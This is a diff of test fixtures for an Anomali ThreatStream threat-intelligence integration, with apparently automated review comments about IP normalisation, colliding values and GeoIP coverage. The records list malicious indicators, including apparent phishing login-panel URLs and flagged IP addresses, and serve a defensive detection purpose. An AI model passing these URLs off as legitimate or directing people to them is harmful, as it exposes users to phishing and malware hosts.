 "original": "{\"created\":\"2020-02-25T02:53:36.382Z\",\"description\":\"TS ID: 55347597492; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime\",\"id\":\"indicator--4fcbf6f5-5acc-42da-acb0-497583b3388d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-53\"],\"modified\":\"2020-02-25T02:53:36.382Z\",\"name\":\"mal_url: http://149.28.186.68/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://149.28.186.68/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:36.382Z\"}",
 "category": "threat",
 "type": "indicator",
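Review bot: The `mal_url` indicator in the hunk at @@ -31690 still carries a public address as its URL host — `http://149.28.186.68/login` appears unchanged in the `original` context line's `name` and `pattern` — while the two sibling `mal_url` indicators with an IP host were rewritten to `http://89.160.20.156/login` at @@ -30313 and @@ -31761 (together with their `url.original`/`url.domain`/`url.full` fields). If the supported-subset rule reaches `url.domain`, as those two replacements suggest, this indicator's `url` block (which sits outside the hunk, above the `event` object) was missed and the sample still holds an address outside the subset; if the rule only concerns `ip`-typed fields, the URL rewrites elsewhere were unnecessary and this one is fine. Either way the fixture is now inconsistent about which kind of field gets normalised, and a short note in the package's test README stating the rule would make the next regeneration predictable. The enclosing indicator object starts and ends outside this hunk.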
@@ -31742,7 +31742,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.390643679Z",
+ "ingested": "2021-12-13T08:38:40.026752200Z",
 "original": "{\"created\":\"2020-02-25T02:53:36.421Z\",\"description\":\"TS ID: 55347597464; iType: mal_url; State: active; Org: Uaservers Network; Source: CyberCrime\",\"id\":\"indicator--713e0d5f-3842-410f-98d8-25fe0f5b15db\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-25T02:53:36.421Z\",\"name\":\"mal_url: http://epperfums.com/dope/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://epperfums.com/dope/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:36.421Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -31761,7 +31761,7 @@
 "object_marking_refs": [
 "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
 ],
- "name": "mal_url: http://45.14.14.191/login",
+ "name": "mal_url: http://89.160.20.156/login",
 "description": "TS ID: 55347597500; iType: mal_url; State: active; Source: CyberCrime",
 "modified": "2020-02-25T02:53:42.111Z",
 "valid_from": "2020-02-25T02:53:42.111Z",
@@ -31785,16 +31785,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://45.14.14.191/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "45.14.14.191", - "full": "http://45.14.14.191/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.390647326Z", - "original": "{\"created\":\"2020-02-25T02:53:42.111Z\",\"description\":\"TS ID: 55347597500; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--895a994a-7833-47fe-a832-fc3ce5f070a5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-02-25T02:53:42.111Z\",\"name\":\"mal_url: http://45.14.14.191/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://45.14.14.191/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:42.111Z\"}", + "ingested": "2021-12-13T08:38:40.026759100Z", + "original": "{\"created\":\"2020-02-25T02:53:42.111Z\",\"description\":\"TS ID: 55347597500; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--895a994a-7833-47fe-a832-fc3ce5f070a5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-02-25T02:53:42.111Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:42.111Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
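Review bot: Four indicators that were distinct before this change — `45.14.14.191` here, `190.97.162.37` (@@ -32123 and @@ -32427), `92.63.197.191` (@@ -32272) and `195.133.201.191` (@@ -32530) — now all carry the value `89.160.20.156`, so this expected file no longer demonstrates that the pipeline keeps separate indicators separate; the two mal_url records in particular end up with identical `name`, `url.domain` and `url.full` values and differ only in their STIX ids. The `description` strings were left untouched, so @@ -32123 and @@ -32427 still read `Org: Cyber Cast International, S.A.`, @@ -32272 `Org: IT DeLuxe Ltd.` and @@ -32530 `Org: RUCloud` next to an address that none of those descriptions originally referred to, which makes the fixture internally inconsistent. If the goal is only to hit the test GeoIP database, I would pick a different supported address per indicator where the database offers more than one, or at minimum keep one mal_ip and one mal_url sample with non-colliding values.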
@@ -31845,7 +31845,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390650912Z", + "ingested": "2021-12-13T08:38:40.026765900Z", "original": "{\"created\":\"2020-02-25T02:54:16.295Z\",\"description\":\"TS ID: 55347597622; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--86fd616d-f6a3-45ff-a3a8-db1aa59defd9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:54:16.295Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/4/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/4/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:54:16.295Z\"}", "category": "threat", "type": "indicator", @@ -31897,7 +31897,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390654579Z", + "ingested": "2021-12-13T08:38:40.026772600Z", "original": "{\"created\":\"2020-02-25T02:54:21.544Z\",\"description\":\"TS ID: 55347597482; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--57fb3a6f-09ca-44a2-b309-724b570e1fd9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-02-25T02:54:21.544Z\",\"name\":\"mal_url: http://klickus.com/bin/cgi/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://klickus.com/bin/cgi/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:54:21.544Z\"}", "category": "threat", "type": "indicator", 
@@ -31949,7 +31949,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390658086Z", + "ingested": "2021-12-13T08:38:40.026779400Z", "original": "{\"created\":\"2020-02-25T02:54:32.178Z\",\"description\":\"TS ID: 55347597608; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--1b2dfaef-5caa-4114-9634-cf2f9959dbfb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:54:32.178Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/5/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/5/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:54:32.178Z\"}", "category": "threat", "type": "indicator", @@ -32001,7 +32001,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390661622Z", + "ingested": "2021-12-13T08:38:40.026786100Z", "original": "{\"created\":\"2020-02-25T02:54:37.327Z\",\"description\":\"TS ID: 55347597484; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime\",\"id\":\"indicator--44544bfd-7131-4530-a9de-96c1840101c1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-25T02:54:37.327Z\",\"name\":\"mal_url: http://ayoobtextlie.com/copy/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ayoobtextlie.com/copy/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:54:37.327Z\"}", "category": "threat", "type": "indicator", 
@@ -32052,7 +32052,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390665369Z", + "ingested": "2021-12-13T08:38:40.026789400Z", "original": "{\"created\":\"2020-02-25T02:54:37.383Z\",\"description\":\"TS ID: 55347597463; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime\",\"id\":\"indicator--51779de2-0d07-4d60-abf6-afdc0dfc7637\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-25T02:54:37.383Z\",\"name\":\"mal_url: http://0ooo.xyz/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://0ooo.xyz/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:54:37.383Z\"}", "category": "threat", "type": "indicator", @@ -32104,7 +32104,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390669106Z", + "ingested": "2021-12-13T08:38:40.026794400Z", "original": "{\"created\":\"2020-02-25T02:54:48.929Z\",\"description\":\"TS ID: 55347597475; iType: mal_url; State: active; Org: Confluence Networks; Source: CyberCrime\",\"id\":\"indicator--b7d14453-ad19-4246-961a-72f0e5136874\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-25T02:54:48.929Z\",\"name\":\"mal_url: http://atlasdecarqo.com/chief4/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://atlasdecarqo.com/chief4/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:54:48.929Z\"}", "category": "threat", "type": "indicator", 
@@ -32123,7 +32123,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 190.97.162.37", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55347597487; iType: mal_ip; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime", "modified": "2020-02-25T02:54:54.632Z", "valid_from": "2020-02-25T02:54:54.632Z", @@ -32145,12 +32145,12 @@ "first_seen": "2020-02-25T02:54:54.632Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "190.97.162.37" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.390672583Z", - "original": "{\"created\":\"2020-02-25T02:54:54.632Z\",\"description\":\"TS ID: 55347597487; iType: mal_ip; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime\",\"id\":\"indicator--064f2766-97b6-481d-a273-f80a97524be8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-47\"],\"modified\":\"2020-02-25T02:54:54.632Z\",\"name\":\"mal_ip: 190.97.162.37\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '190.97.162.37']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:54:54.632Z\"}", + "ingested": "2021-12-13T08:38:40.026815700Z", + "original": "{\"created\":\"2020-02-25T02:54:54.632Z\",\"description\":\"TS ID: 55347597487; iType: mal_ip; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime\",\"id\":\"indicator--064f2766-97b6-481d-a273-f80a97524be8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-47\"],\"modified\":\"2020-02-25T02:54:54.632Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:54:54.632Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -32201,7 +32201,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390676611Z", + "ingested": "2021-12-13T08:38:40.026821700Z", "original": "{\"created\":\"2020-02-25T02:55:06.15Z\",\"description\":\"TS ID: 55347597650; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--3f3bca20-c218-431d-8250-0f600b011971\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:55:06.15Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/1/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/1/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:06.15Z\"}", "category": "threat", "type": "indicator", @@ -32253,7 +32253,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390680227Z", + "ingested": "2021-12-13T08:38:40.026825400Z", "original": "{\"created\":\"2020-02-25T02:55:06.186Z\",\"description\":\"TS ID: 55347597472; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime\",\"id\":\"indicator--6b3d6689-75e8-4f50-a1c0-f1a1e6158493\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-25T02:55:06.186Z\",\"name\":\"mal_url: http://ayoobtextlie.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ayoobtextlie.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:06.186Z\"}", "category": "threat", "type": "indicator", 
@@ -32272,7 +32272,7 @@
 "object_marking_refs": [
 "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
 ],
- "name": "mal_url: http://92.63.197.191/login",
+ "name": "mal_url: http://89.160.20.156/login",
 "description": "TS ID: 55347597495; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime",
 "modified": "2020-02-25T02:55:06.314Z",
 "valid_from": "2020-02-25T02:55:06.314Z",
@@ -32296,16 +32296,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://92.63.197.191/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "92.63.197.191", - "full": "http://92.63.197.191/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.390683704Z", - "original": "{\"created\":\"2020-02-25T02:55:06.314Z\",\"description\":\"TS ID: 55347597495; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--1306883c-b911-4116-9121-492450e4bb07\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-56\"],\"modified\":\"2020-02-25T02:55:06.314Z\",\"name\":\"mal_url: http://92.63.197.191/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://92.63.197.191/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:06.314Z\"}", + "ingested": "2021-12-13T08:38:40.026830500Z", + "original": "{\"created\":\"2020-02-25T02:55:06.314Z\",\"description\":\"TS ID: 55347597495; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--1306883c-b911-4116-9121-492450e4bb07\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-56\"],\"modified\":\"2020-02-25T02:55:06.314Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:06.314Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -32356,7 +32356,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390687922Z", + "ingested": "2021-12-13T08:38:40.026834500Z", "original": "{\"created\":\"2020-02-25T02:55:27.523Z\",\"description\":\"TS ID: 55347597627; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--d4a02ea1-435f-472e-8013-07e4e24f5a2e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:55:27.523Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/3/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/3/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:27.523Z\"}", "category": "threat", "type": "indicator", @@ -32408,7 +32408,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390691669Z", + "ingested": "2021-12-13T08:38:40.026838500Z", "original": "{\"created\":\"2020-02-25T02:55:35.424Z\",\"description\":\"TS ID: 55347597528; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime\",\"id\":\"indicator--1e8d894d-1e8b-4ba9-ae25-1e3e00c055ce\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-25T02:55:35.424Z\",\"name\":\"mal_url: http://atomicwallet.email/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://atomicwallet.email/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:35.424Z\"}", "category": "threat", "type": "indicator", 
@@ -32427,7 +32427,7 @@
 "object_marking_refs": [
 "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
 ],
- "name": "mal_url: http://190.97.162.37/login",
+ "name": "mal_url: http://89.160.20.156/login",
 "description": "TS ID: 55347597489; iType: mal_url; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime",
 "modified": "2020-02-25T02:55:35.462Z",
 "valid_from": "2020-02-25T02:55:35.462Z",
@@ -32451,16 +32451,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://190.97.162.37/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "190.97.162.37", - "full": "http://190.97.162.37/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.390727226Z", - "original": "{\"created\":\"2020-02-25T02:55:35.462Z\",\"description\":\"TS ID: 55347597489; iType: mal_url; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime\",\"id\":\"indicator--cb377636-13ce-421e-926f-e33e2b954263\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-47\"],\"modified\":\"2020-02-25T02:55:35.462Z\",\"name\":\"mal_url: http://190.97.162.37/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://190.97.162.37/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:35.462Z\"}", + "ingested": "2021-12-13T08:38:40.026841800Z", + "original": "{\"created\":\"2020-02-25T02:55:35.462Z\",\"description\":\"TS ID: 55347597489; iType: mal_url; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime\",\"id\":\"indicator--cb377636-13ce-421e-926f-e33e2b954263\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-47\"],\"modified\":\"2020-02-25T02:55:35.462Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:35.462Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -32511,7 +32511,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390866026Z", + "ingested": "2021-12-13T08:38:40.026846600Z", "original": "{\"created\":\"2020-02-25T02:55:35.496Z\",\"description\":\"TS ID: 55347597477; iType: mal_url; State: active; Org: Confluence Networks; Source: CyberCrime\",\"id\":\"indicator--1163cdee-566a-404a-b66e-657857eb4af3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-25T02:55:35.496Z\",\"name\":\"mal_url: http://atlasdecarqo.com/chief2/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://atlasdecarqo.com/chief2/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:35.496Z\"}", "category": "threat", "type": "indicator", @@ -32530,7 +32530,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 195.133.201.191", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55347597536; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime", "modified": "2020-02-25T02:55:39.691Z", "valid_from": "2020-02-25T02:55:39.691Z", 
@@ -32552,12 +32552,12 @@ "first_seen": "2020-02-25T02:55:39.691Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "195.133.201.191" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.390873851Z", - "original": "{\"created\":\"2020-02-25T02:55:39.691Z\",\"description\":\"TS ID: 55347597536; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime\",\"id\":\"indicator--3190b47c-44f4-4e7e-8bd5-7b16a62fd3e9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:55:39.691Z\",\"name\":\"mal_ip: 195.133.201.191\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '195.133.201.191']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:39.691Z\"}", + "ingested": "2021-12-13T08:38:40.026873800Z", + "original": "{\"created\":\"2020-02-25T02:55:39.691Z\",\"description\":\"TS ID: 55347597536; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime\",\"id\":\"indicator--3190b47c-44f4-4e7e-8bd5-7b16a62fd3e9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:55:39.691Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:55:39.691Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" diff --git a/packages/ti_anomali/data_stream/threatstream/_dev/test/pipeline/test-anomali-threatstream.json b/packages/ti_anomali/data_stream/threatstream/_dev/test/pipeline/test-anomali-threatstream.json index db821cfd0ca..071b4d440fb 100644 --- a/packages/ti_anomali/data_stream/threatstream/_dev/test/pipeline/test-anomali-threatstream.json +++ b/packages/ti_anomali/data_stream/threatstream/_dev/test/pipeline/test-anomali-threatstream.json 
@@ -18,7 +18,7 @@
 "state": "active",
 "import_session_id": 2832,
 "value_type": "domain",
- "srcip": "203.0.113.39",
+ "srcip": "192.168.113.39",
 "org": "OVH Hosting",
 "date_last": "2020-10-08T12:24:42",
 "country": "FR",
@@ -42,7 +42,7 @@
 "state": "active",
 "update_id": 2406643974,
 "trusted_circle_ids": "500,12",
- "srcip": "192.0.2.111",
+ "srcip": "192.168.2.111",
 "detail2": "imported by user 329",
 "value_type": "ip",
 "source_feed_id": 3817,
@@ -68,7 +68,7 @@
 "state": "active",
 "import_session_id": 3128,
 "value_type": "ip",
- "srcip": "203.0.113.98",
+ "srcip": "192.168.113.98",
 "org": "Cox Communications",
 "asn": "22773",
 "date_last": "2020-10-08T12:24:42",
@@ -115,7 +115,7 @@
 "state": "active",
 "import_session_id": 1985,
 "value_type": "ip",
- "srcip": "203.0.113.96",
+ "srcip": "192.168.113.96",
 "org": "Spectrum",
 "asn": "20001",
 "date_last": "2020-10-09T18:49:37",
@@ -141,7 +141,7 @@
 "state": "active",
 "import_session_id": 1570,
 "value_type": "ip",
- "srcip": "203.0.113.157",
+ "srcip": "192.168.113.157",
 "org": "Spectrum",
 "asn": "11351",
 "date_last": "2020-10-09T18:49:37",
@@ -157,7 +157,7 @@
 "severity": "very-high",
 "classification": "private",
 "trusted_circle_ids": "775,702,615",
- "detail": "gnh7,Botnet-DRZ8-,popularity=low,type=2,first_seen=2020-01-07T01:38:35,Botnet-WSPDZDY,mask=203.0.113.180,popularity=low,threat=gu3wn7",
+ "detail": "gnh7,Botnet-DRZ8-,popularity=low,type=2,first_seen=2020-01-07T01:38:35,Botnet-WSPDZDY,mask=192.168.113.180,popularity=low,threat=gu3wn7",
 "date_first": "2020-10-09T18:14:43",
 "source": "Phony generated indicator",
 "state": "active",
@@ -165,7 +165,7 @@
 "date_last": "2020-10-09T18:14:43",
 "domain": "frg.example.com",
 "lat": 41.9036,
- "srcip": "192.0.2.19",
+ "srcip": "192.168.2.19",
 "detail2": "imported by user 606",
 "value_type": "domain",
 "source_feed_id": 2336,
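Review bot: The `srcip` edits in this file trade RFC 5737 documentation addresses (`203.0.113.x`, `192.0.2.x`) for RFC 1918 private space (`192.168.113.x`, `192.168.2.x`), and every `2001:db8::/32` documentation address for the one routable address `2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6`; the same pattern runs through the remaining hunks up to @@ -2297. Private addresses are often excluded from GeoIP enrichment, so if the intent (per the PR title) is to exercise the supported GeoIP subset, the `192.168.*` records will likely take a different path through the pipeline than the public documentation values did — worth confirming against the geoip step and recording the intent in the test config. Collapsing every IPv6 sample onto a single address also means a record mix-up in the pipeline would no longer show up in the expected output; if the supported set has more than one IPv6 address, using a distinct one per record keeps that check.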
@@ -210,7 +210,7 @@
 "update_id": 1334843074,
 "date_last": "2020-10-09T18:30:13",
 "trusted_circle_ids": "458,149",
- "srcip": "203.0.113.163",
+ "srcip": "192.168.113.163",
 "detail2": "imported by user 813",
 "value_type": "url",
 "source_feed_id": 2988,
@@ -235,7 +235,7 @@
 "update_id": 3765836294,
 "date_last": "2020-10-09T18:30:13",
 "trusted_circle_ids": "320,876,412",
- "srcip": "203.0.113.217",
+ "srcip": "192.168.113.217",
 "detail2": "imported by user 286",
 "value_type": "url",
 "source_feed_id": 2345,
@@ -304,7 +304,7 @@
 "update_id": 2618878309,
 "date_last": "2020-10-09T18:30:30",
 "trusted_circle_ids": "96,671,974",
- "srcip": "203.0.113.62",
+ "srcip": "192.168.113.62",
 "detail2": "imported by user 67",
 "value_type": "url",
 "source_feed_id": 2250,
@@ -496,7 +496,7 @@
 "severity": "very-high",
 "classification": "public",
 "trusted_circle_ids": "206,131",
- "detail": "-tc0y,6mp2f,033j,mask=203.0.113.47,threat=n922n81",
+ "detail": "-tc0y,6mp2f,033j,mask=192.168.113.47,threat=n922n81",
 "date_first": "2020-10-09T18:31:27",
 "source": "Phony generated indicator",
 "state": "active",
@@ -549,7 +549,7 @@
 "update_id": 2330081388,
 "date_last": "2020-10-09T18:31:34",
 "trusted_circle_ids": "163,899",
- "srcip": "203.0.113.228",
+ "srcip": "192.168.113.228",
 "detail2": "imported by user 550",
 "value_type": "url",
 "source_feed_id": 823,
@@ -639,7 +639,7 @@
 "update_id": 3168103115,
 "date_last": "2020-10-09T18:31:49",
 "trusted_circle_ids": "581",
- "srcip": "192.0.2.228",
+ "srcip": "192.168.2.228",
 "detail2": "imported by user 276",
 "value_type": "ip",
 "source_feed_id": 1942,
@@ -664,7 +664,7 @@
 "update_id": 3643377559,
 "date_last": "2020-10-09T18:31:49",
 "trusted_circle_ids": "997",
- "srcip": "2001:db8:6186:eed0:6cbc:e2df:d062:6167",
+ "srcip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6",
 "detail2": "imported by user 805",
 "value_type": "url",
 "source_feed_id": 2783,
@@ -689,7 +689,7 @@
 "update_id": 1454243906,
 "date_last": "2020-10-09T18:31:58",
 "trusted_circle_ids": "155,169",
- "srcip": "203.0.113.73",
+ "srcip": "192.168.113.73",
 "detail2": "imported by user 298",
 "value_type": "url",
 "source_feed_id": 428,
